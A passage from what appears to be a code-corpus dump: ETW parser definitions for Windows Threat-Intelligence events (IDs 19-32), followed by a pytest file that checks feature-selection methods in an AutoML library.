"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=19, version=0)
class Microsoft_Windows_Threat_Intelligence_19_0(Etw):
pattern = Struct(
"OperationStatus" / Int32ul,
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=20, version=0)
class Microsoft_Windows_Threat_Intelligence_20_0(Etw):
pattern = Struct(
"OperationStatus" / Int32ul,
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=21, version=0)
class Microsoft_Windows_Threat_Intelligence_21_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"OriginalProcessId" / Int32ul,
"OriginalProcessCreateTime" / Int64ul,
"OriginalProcessStartKey" / Int64ul,
"OriginalProcessSignatureLevel" / Int8ul,
"OriginalProcessSectionSignatureLevel" / Int8ul,
"OriginalProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"RegionSize" / Int64ul,
"AllocationType" / Int32ul,
"ProtectionMask" / Int32ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=22, version=0)
class Microsoft_Windows_Threat_Intelligence_22_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"OriginalProcessId" / Int32ul,
"OriginalProcessCreateTime" / Int64ul,
"OriginalProcessStartKey" / Int64ul,
"OriginalProcessSignatureLevel" / Int8ul,
"OriginalProcessSectionSignatureLevel" / Int8ul,
"OriginalProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"RegionSize" / Int64ul,
"ProtectionMask" / Int32ul,
"LastProtectionMask" / Int32ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=23, version=0)
class Microsoft_Windows_Threat_Intelligence_23_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"ViewSize" / Int64ul,
"AllocationType" / Int32ul,
"ProtectionMask" / Int32ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=24, version=0)
class Microsoft_Windows_Threat_Intelligence_24_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"TargetThreadId" / Int32ul,
"TargetThreadCreateTime" / Int64ul,
"OriginalProcessId" / Int32ul,
"OriginalProcessCreateTime" / Int64ul,
"OriginalProcessStartKey" / Int64ul,
"OriginalProcessSignatureLevel" / Int8ul,
"OriginalProcessSectionSignatureLevel" / Int8ul,
"OriginalProcessProtection" / Int8ul,
"TargetThreadAlertable" / Int8ul,
"ApcRoutine" / Int64ul,
"ApcArgument1" / Int64ul,
"ApcArgument2" / Int64ul,
"ApcArgument3" / Int64ul,
"RealEventTime" / Int64ul,
"ApcRoutineVadQueryResult" / Int32ul,
"ApcRoutineVadAllocationBase" / Int64ul,
"ApcRoutineVadAllocationProtect" / Int32ul,
"ApcRoutineVadRegionType" / Int32ul,
"ApcRoutineVadRegionSize" / Int64ul,
"ApcRoutineVadCommitSize" / Int64ul,
"ApcRoutineVadMmfName" / WString,
"ApcArgument1VadQueryResult" / Int32ul,
"ApcArgument1VadAllocationBase" / Int64ul,
"ApcArgument1VadAllocationProtect" / Int32ul,
"ApcArgument1VadRegionType" / Int32ul,
"ApcArgument1VadRegionSize" / Int64ul,
"ApcArgument1VadCommitSize" / Int64ul,
"ApcArgument1VadMmfName" / WString
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=25, version=0)
class Microsoft_Windows_Threat_Intelligence_25_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"TargetThreadId" / Int32ul,
"TargetThreadCreateTime" / Int64ul,
"ContextFlags" / Int32ul,
"ContextMask" / Int16ul,
"Pc" / Int64ul,
"Sp" / Int64ul,
"Lr" / Int64ul,
"Fp" / Int64ul,
"Reg0" / Int64ul,
"Reg1" / Int64ul,
"Reg2" / Int64ul,
"Reg3" / Int64ul,
"Reg4" / Int64ul,
"Reg5" / Int64ul,
"Reg6" / Int64ul,
"Reg7" / Int64ul,
"RealEventTime" / Int64ul,
"PcVadQueryResult" / Int32ul,
"PcVadAllocationBase" / Int64ul,
"PcVadAllocationProtect" / Int32ul,
"PcVadRegionType" / Int32ul,
"PcVadRegionSize" / Int64ul,
"PcVadCommitSize" / Int64ul,
"PcVadMmfName" / WString
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=26, version=0)
class Microsoft_Windows_Threat_Intelligence_26_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"OriginalProcessId" / Int32ul,
"OriginalProcessCreateTime" / Int64ul,
"OriginalProcessStartKey" / Int64ul,
"OriginalProcessSignatureLevel" / Int8ul,
"OriginalProcessSectionSignatureLevel" / Int8ul,
"OriginalProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"RegionSize" / Int64ul,
"AllocationType" / Int32ul,
"ProtectionMask" / Int32ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=27, version=0)
class Microsoft_Windows_Threat_Intelligence_27_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"OriginalProcessId" / Int32ul,
"OriginalProcessCreateTime" / Int64ul,
"OriginalProcessStartKey" / Int64ul,
"OriginalProcessSignatureLevel" / Int8ul,
"OriginalProcessSectionSignatureLevel" / Int8ul,
"OriginalProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"RegionSize" / Int64ul,
"ProtectionMask" / Int32ul,
"LastProtectionMask" / Int32ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=28, version=0)
class Microsoft_Windows_Threat_Intelligence_28_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"ViewSize" / Int64ul,
"AllocationType" / Int32ul,
"ProtectionMask" / Int32ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=29, version=0)
class Microsoft_Windows_Threat_Intelligence_29_0(Etw):
pattern = Struct(
"DriverNameLength" / Int16ul,
"DriverName" / Bytes(lambda this: this.DriverNameLength),
"CodeIntegrityOption" / Int32ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=30, version=0)
class Microsoft_Windows_Threat_Intelligence_30_0(Etw):
pattern = Struct(
"DriverNameLength" / Int16ul,
"DriverName" / Bytes(lambda this: this.DriverNameLength)
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=31, version=0)
class Microsoft_Windows_Threat_Intelligence_31_0(Etw):
pattern = Struct(
"DriverNameLength" / Int16ul,
"DriverName" / Bytes(lambda this: this.DriverNameLength),
"DeviceNameLength" / Int16ul,
"DeviceName" / Bytes(lambda this: this.DeviceNameLength)
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=32, version=0)
class Microsoft_Windows_Threat_Intelligence_32_0(Etw):
pattern = Struct(
"DriverNameLength" / Int16ul,
"DriverName" / Bytes(lambda this: this.DriverNameLength),
"DeviceNameLength" / Int16ul,
"DeviceName" / Bytes(lambda this: this.DeviceNameLength)
)
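# A minimal sketch of how these construct-based patterns parse a raw event
# payload into named fields. The byte blob below is fabricated purely for
# illustration and is not real ETW data.
example_pattern = Struct(
    "CallingProcessId" / Int32ul,
    "CallingProcessCreateTime" / Int64ul,
)
example_blob = (1234).to_bytes(4, "little") + (0).to_bytes(8, "little")
assert example_pattern.parse(example_blob).CallingProcessId == 1234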
[per-file metrics and quality-signal columns omitted]
d14bf4e0d49c3a77ab698d38d7c78e2725a23b73 | 18,296 | py | Python | tests/test_feature_selection/test_feature_selection.py | PanyiDong/AutoML | 4d981b0287fa27d7a38f029e4b20b3a89e1de4f9 | ["MIT"] | null | null | null
"""
File: test_feature_selection.py
Author: Panyi Dong
GitHub: https://github.com/PanyiDong/
Mathematics Department, University of Illinois at Urbana-Champaign (UIUC)
Project: My_AutoML
Latest Version: 0.2.0
Relative Path: /tests/test_feature_selection/test_feature_selection.py
File Created: Friday, 15th April 2022 12:27:07 pm
Author: Panyi Dong (panyid2@illinois.edu)
-----
Last Modified: Wednesday, 11th May 2022 9:57:52 am
Modified By: Panyi Dong (panyid2@illinois.edu)
-----
MIT License
Copyright (c) 2022 - 2022, Panyi Dong
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import numpy as np
import pandas as pd
from My_AutoML._feature_selection import feature_selections
from My_AutoML._feature_selection._base import (
PCA_FeatureSelection,
RBFSampler,
)
def test_feature_selection():
# loop through all feature selection methods
    for method_name, method in feature_selections.items():
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
if method_name in ["FeatureFilter", "ASFFS", "GeneticAlgorithm", "RBFSampler"]:
pass
elif method_name == "SFS":
feature_selection = method(
estimator="Lasso",
n_components=5,
criteria="MSE",
)
elif method_name in ["mRMR", "CBFS"]:
feature_selection = method(n_components=5)
else:
feature_selection = method()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
if method_name != "polynomial":
assert (
_X.shape[1] <= X.shape[1]
), "Feature selection method {} failed".format(method_name)
# test sklearn version if autosklearn is installed
    import importlib.util
autosklearn_spec = importlib.util.find_spec("autosklearn")
if autosklearn_spec is not None:
from My_AutoML._feature_selection._sklearn import (
extra_trees_preproc_for_classification,
extra_trees_preproc_for_regression,
liblinear_svc_preprocessor,
polynomial,
select_percentile_classification,
select_percentile_regression,
select_rates_classification,
select_rates_regression,
truncatedSVD,
)
methods = {
"extra_trees_preproc_for_classification": extra_trees_preproc_for_classification,
"extra_trees_preproc_for_regression": extra_trees_preproc_for_regression,
"liblinear_svc_preprocessor": liblinear_svc_preprocessor,
"polynomial": polynomial,
"select_percentile_classification": select_percentile_classification,
"select_percentile_regression": select_percentile_regression,
"select_rates_classification": select_rates_classification,
"select_rates_regression": select_rates_regression,
"truncatedSVD": truncatedSVD,
}
        for method_name, method in methods.items():
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = method()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
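# A self-contained sketch (hypothetical, not part of the original suite) of the
# fit/transform/_fitted contract each loop iteration above asserts, using
# synthetic data instead of the Appendix CSV:
def _demo_selector_contract():
    X_demo = pd.DataFrame(np.random.rand(100, 8))
    y_demo = pd.Series(np.random.randint(0, 2, size=100))
    fs = PCA_FeatureSelection(n_components=5, solver="auto")
    fs.fit(X_demo, y_demo)
    assert fs._fitted, "Fitted should be True"
    assert fs.transform(X_demo).shape[1] <= X_demo.shape[1]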
def test_FeatureFilter():
from My_AutoML._feature_selection import FeatureFilter
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = FeatureFilter(
n_components=5,
criteria="Pearson",
)
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
assert _X.shape[1] <= X.shape[1], "Feature selection method FeatureFilter failed"
feature_selection = FeatureFilter(
n_components=5,
criteria="MI",
)
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
assert _X.shape[1] <= X.shape[1], "Feature selection method FeatureFilter failed"
def test_ASFFS():
from My_AutoML._feature_selection import ASFFS
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = ASFFS(
n_components=5,
model="Linear",
)
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
assert _X.shape[1] <= X.shape[1], "Feature selection method ASFFS failed"
feature_selection = ASFFS(
n_components=5,
model="Lasso",
)
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
assert _X.shape[1] <= X.shape[1], "Feature selection method ASFFS failed"
feature_selection = ASFFS(n_components=5, model="Ridge", objective="MAE")
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
assert _X.shape[1] <= X.shape[1], "Feature selection method ASFFS failed"
def test_GA():
from My_AutoML._encoding import DataEncoding
from My_AutoML._feature_selection import GeneticAlgorithm
data = pd.read_csv("Appendix/heart.csv")
formatter = DataEncoding()
# to numerical
formatter.fit(data)
data = formatter.refit(data)
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = GeneticAlgorithm(
n_components=5,
feature_selection="random",
fitness_fit="Linear",
n_generations=50,
p_mutation=0.1,
)
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
assert _X.shape[1] <= X.shape[1], "Feature selection method GeneticAlgorithm failed"
feature_selection = GeneticAlgorithm(
n_components=5, feature_selection=["Entropy"], fitness_fit="Decision Tree"
)
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
assert _X.shape[1] <= X.shape[1], "Feature selection method GeneticAlgorithm failed"
feature_selection = GeneticAlgorithm(
n_components=5, feature_selection=["t_statistics"], fitness_fit="Random Forest"
)
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
assert _X.shape[1] <= X.shape[1], "Feature selection method GeneticAlgorithm failed"
feature_selection = GeneticAlgorithm(
n_components=5, feature_selection="auto", fitness_fit="SVM"
)
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
assert _X.shape[1] <= X.shape[1], "Feature selection method GeneticAlgorithm failed"
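# A minimal sketch (hypothetical) of the DataEncoding round trip used above:
# categorical columns are fitted and rewritten as numerical codes before the
# genetic algorithm runs. The toy frame is an assumption:
def _demo_data_encoding():
    from My_AutoML._encoding import DataEncoding
    demo = pd.DataFrame({"color": ["red", "blue", "red"], "target": [1, 0, 1]})
    enc = DataEncoding()
    enc.fit(demo)
    demo_numerical = enc.refit(demo)  # all columns numerical afterwards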
def test_feature_selection_PCA_FeatureSelection():
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = PCA_FeatureSelection(
n_components=5,
solver="auto",
)
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
feature_selection = PCA_FeatureSelection(
n_components=5,
solver="full",
)
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
feature_selection = PCA_FeatureSelection(
n_components=5,
solver="truncated",
)
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
feature_selection = PCA_FeatureSelection(
n_components=5,
solver="randomized",
)
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
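# For reference, a hedged sketch (assumes scikit-learn is installed) of the
# analogous solver switch in sklearn's PCA; "full" and "randomized" mirror two
# of the options exercised above, while "truncated" has no direct counterpart:
def _demo_sklearn_pca_solvers():
    from sklearn.decomposition import PCA
    X_demo = np.random.rand(50, 8)
    for svd_solver in ["auto", "full", "randomized"]:
        reduced = PCA(n_components=5, svd_solver=svd_solver).fit_transform(X_demo)
        assert reduced.shape == (50, 5)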
# def test_feature_selection_LDASelection():
# data = pd.read_csv("Appendix/Medicalpremium.csv")
# X = data.iloc[:, :-1]
# y = data.iloc[:, -1]
# feature_selection = LDASelection(n_components=5)
# feature_selection.fit(X, y)
# assert feature_selection._fitted == True, "Fitted should be True"
def test_feature_selection_RBFSampler():
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = RBFSampler(n_components=5)
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
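# For reference, a hedged sketch (assumes scikit-learn) of the classic
# random-Fourier-feature sampler that the RBFSampler above resembles; the
# resemblance is an assumption, not a statement about its implementation:
def _demo_sklearn_rbf_sampler():
    from sklearn.kernel_approximation import RBFSampler as SkRBFSampler
    X_demo = np.random.rand(50, 8)
    mapped = SkRBFSampler(n_components=5, random_state=0).fit_transform(X_demo)
    assert mapped.shape == (50, 5)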
# test deprecated methods
def test_feature_selection_densifier():
    import importlib.util
autosklearn_spec = importlib.util.find_spec("autosklearn")
if autosklearn_spec is None:
from My_AutoML._feature_selection._sklearn import densifier
else:
from My_AutoML._feature_selection._autosklearn import densifier
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = densifier()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
# add tests for sklearn methods when autosklearn is installed
if autosklearn_spec is not None:
from My_AutoML._feature_selection._sklearn import densifier
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = densifier()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
# def test_feature_selection_fast_ica():
# from My_AutoML._feature_selection._autosklearn import fast_ica
# data = pd.read_csv("Appendix/Medicalpremium.csv")
# X = data.iloc[:, :-1]
# y = data.iloc[:, -1]
# feature_selection = fast_ica()
# feature_selection.fit(X, y)
# _X = feature_selection.transform(X)
# assert feature_selection._fitted == True, "Fitted should be True"
def test_feature_selection_feature_agglomeration():
    import importlib.util
autosklearn_spec = importlib.util.find_spec("autosklearn")
if autosklearn_spec is None:
from My_AutoML._feature_selection._sklearn import feature_agglomeration
else:
from My_AutoML._feature_selection._autosklearn import feature_agglomeration
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = feature_agglomeration()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
# add tests for sklearn methods when autosklearn is installed
if autosklearn_spec is not None:
from My_AutoML._feature_selection._sklearn import feature_agglomeration
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = feature_agglomeration()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
def test_feature_selection_kernel_pca():
    import importlib.util
autosklearn_spec = importlib.util.find_spec("autosklearn")
if autosklearn_spec is None:
from My_AutoML._feature_selection._sklearn import kernel_pca
else:
from My_AutoML._feature_selection._autosklearn import kernel_pca
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = kernel_pca()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
# add tests for sklearn methods when autosklearn is installed
if autosklearn_spec is not None:
from My_AutoML._feature_selection._sklearn import kernel_pca
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = kernel_pca()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
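# The deprecated-method tests in this block all share one shape; a hypothetical
# shared helper (not part of the original suite) condensing that pattern:
def _check_deprecated_method(method_cls):
    data = pd.read_csv("Appendix/Medicalpremium.csv")
    X, y = data.iloc[:, :-1], data.iloc[:, -1]
    fs = method_cls()
    fs.fit(X, y)
    fs.transform(X)
    assert fs._fitted, "Fitted should be True"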
def test_feature_selection_kitchen_sinks():
    import importlib.util
autosklearn_spec = importlib.util.find_spec("autosklearn")
if autosklearn_spec is None:
from My_AutoML._feature_selection._sklearn import kitchen_sinks
else:
from My_AutoML._feature_selection._autosklearn import kitchen_sinks
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = kitchen_sinks()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
# add tests for sklearn methods when autosklearn is installed
if autosklearn_spec is not None:
from My_AutoML._feature_selection._sklearn import kitchen_sinks
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = kitchen_sinks()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
def test_feature_selection_nystroem_sampler():
    import importlib.util
autosklearn_spec = importlib.util.find_spec("autosklearn")
if autosklearn_spec is None:
from My_AutoML._feature_selection._sklearn import nystroem_sampler
else:
from My_AutoML._feature_selection._autosklearn import nystroem_sampler
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = nystroem_sampler()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
# add tests for sklearn methods when autosklearn is installed
if autosklearn_spec is not None:
from My_AutoML._feature_selection._sklearn import nystroem_sampler
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = nystroem_sampler()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
def test_feature_selection_pca():
    import importlib.util
autosklearn_spec = importlib.util.find_spec("autosklearn")
if autosklearn_spec is None:
from My_AutoML._feature_selection._sklearn import pca
else:
from My_AutoML._feature_selection._autosklearn import pca
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = pca()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
# add tests for sklearn methods when autosklearn is installed
if autosklearn_spec is not None:
from My_AutoML._feature_selection._sklearn import pca
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = pca()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
def test_feature_selection_random_trees_embedding():
    import importlib.util
autosklearn_spec = importlib.util.find_spec("autosklearn")
if autosklearn_spec is None:
from My_AutoML._feature_selection._sklearn import random_trees_embedding
else:
from My_AutoML._feature_selection._autosklearn import random_trees_embedding
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = random_trees_embedding()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
# add tests for sklearn methods when autosklearn is installed
if autosklearn_spec is not None:
from My_AutoML._feature_selection._sklearn import random_trees_embedding
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = random_trees_embedding()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
| 32.042032
| 93
